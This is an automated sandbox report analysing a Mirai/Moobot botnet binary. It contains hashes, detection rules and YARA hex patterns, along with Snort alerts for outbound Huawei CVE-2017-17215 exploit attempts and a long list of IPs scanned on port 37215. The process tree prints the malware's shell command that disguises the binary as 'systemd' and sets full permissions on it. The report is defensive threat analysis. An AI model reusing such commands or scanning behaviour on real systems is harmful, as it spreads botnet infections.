Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
VeTv7e9Dcz.elf

Overview

General Information

Sample Name:VeTv7e9Dcz.elf
Original Sample Name:63ecd0078f4faaf6905fbbc25d6d2d64.elf
Analysis ID:830765
MD5:63ecd0078f4faaf6905fbbc25d6d2d64
SHA1:45784cb48d376fda8480e009405fc6f383e9d209
SHA256:363ff4d7111088d2f670a7d4da8a3427ca5af8a8459b39366ae279e835977747
Tags:32elfmiraipowerpc
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830765
Start date and time:2023-03-20 17:11:42 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 28s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:VeTv7e9Dcz.elf
Original Sample Name:63ecd0078f4faaf6905fbbc25d6d2d64.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@100/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/VeTv7e9Dcz.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
^p
Standard Error:
  • system is lnxubuntu20
  • VeTv7e9Dcz.elf (PID: 6226, Parent: 6121, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/VeTv7e9Dcz.elf
    • sh (PID: 6228, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/VeTv7e9Dcz.elf bin/systemd; chmod 777 bin/systemd"
      • sh New Fork (PID: 6230, Parent: 6228)
      • rm (PID: 6230, Parent: 6228, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/systemd
      • sh New Fork (PID: 6231, Parent: 6228)
      • mkdir (PID: 6231, Parent: 6228, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6232, Parent: 6228)
      • mv (PID: 6232, Parent: 6228, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/VeTv7e9Dcz.elf bin/systemd
      • sh New Fork (PID: 6233, Parent: 6228)
      • chmod (PID: 6233, Parent: 6228, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/systemd
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
VeTv7e9Dcz.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    VeTv7e9Dcz.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      VeTv7e9Dcz.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xd33c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd38c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd3f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd42c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd47c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xd4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6236.1.00007fa060001000.00007fa060011000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6236.1.00007fa060001000.00007fa060011000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6236.1.00007fa060001000.00007fa060011000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xd33c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd38c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd3f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd42c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd440:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd454:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd468:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd47c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd490:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xd4cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6226.1.00007fa060001000.00007fa060011000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
            6226.1.00007fa060001000.00007fa060011000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 5 entries
              Timestamp:192.168.2.2341.232.168.14444248372152835222 03/20/23-17:12:55.092526
              SID:2835222
              Source Port:44248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23197.246.213.14260578372152835222 03/20/23-17:13:02.227474
              SID:2835222
              Source Port:60578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2384.7.168.24133778372152835222 03/20/23-17:12:38.593270
              SID:2835222
              Source Port:33778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: VeTv7e9Dcz.elfReversingLabs: Detection: 58%
              Source: VeTv7e9Dcz.elfVirustotal: Detection: 60%Perma Link

              Networking

              barindex
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33778 -> 84.7.168.241:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44248 -> 41.232.168.144:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60578 -> 197.246.213.142:37215
              Source: global trafficTCP traffic: 197.6.121.35 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.131.79.237 ports 1,2,3,5,7,37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44248 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44248
              Source: unknownNetwork traffic detected: HTTP traffic on port 60578 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60578
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 180.228.5.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 168.56.24.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.19.106.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.76.13.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.76.63.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.116.170.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.110.179.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 34.123.68.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.122.134.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.11.11.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.61.197.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.152.161.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.163.141.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.9.82.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.81.86.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 138.169.157.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.164.110.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.198.39.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.53.253.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.189.2.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.180.105.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.27.87.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.174.157.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.250.35.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.231.16.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.148.37.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.230.151.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.187.146.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 119.166.35.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.87.60.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.217.204.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.222.172.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.31.178.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.115.99.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.13.223.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 143.105.138.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 32.60.204.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.69.39.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.121.213.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.247.80.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.174.171.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 148.187.75.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.148.62.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.119.248.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.136.47.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.89.58.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.254.87.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.128.204.82:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.176.123.57:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.138.24.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.194.198.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.80.247.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.66.163.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 4.248.192.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.35.40.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.38.10.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.154.85.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.100.32.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.17.250.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 151.153.7.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.236.97.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.183.179.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 89.172.6.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.186.119.105:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.200.205.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.90.200.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.105.69.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 193.243.220.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.21.142.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.81.78.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 173.73.96.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.112.254.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 182.104.117.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.218.216.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 153.201.56.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.86.69.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.242.198.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 2.15.154.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.91.158.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.247.48.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.130.51.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.80.4.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.146.210.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.57.32.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 67.29.55.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.77.55.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.11.209.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.52.188.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.220.42.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.77.191.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.90.51.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.157.128.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.106.158.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.25.216.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.232.149.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.8.42.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.128.61.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.164.71.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.50.84.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.46.68.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.144.78.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 53.62.130.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.203.34.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.208.154.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.49.75.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.252.245.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.34.180.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.27.89.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.121.43.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 153.195.47.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.36.20.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.122.64.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.211.111.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.248.2.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 89.253.77.75:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.147.71.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.150.241.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.10.159.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 119.126.60.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.138.135.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.2.252.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 94.113.122.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.49.194.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 19.100.3.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 129.133.235.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.187.136.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 44.20.25.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.63.97.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.69.44.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.215.97.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.38.98.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.175.47.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.135.61.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.154.123.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.109.226.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.97.96.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 1.189.36.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.135.72.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.247.93.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 87.232.151.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.130.49.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 156.148.10.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.113.12.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.35.130.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.115.252.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.99.148.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 59.52.74.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.103.2.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.144.131.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.38.65.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.167.238.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.146.242.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.154.235.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.58.222.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 43.121.71.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 64.28.164.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.241.46.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.3.23.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.210.246.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.252.201.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.93.179.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 59.64.194.82:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.198.75.47:37215
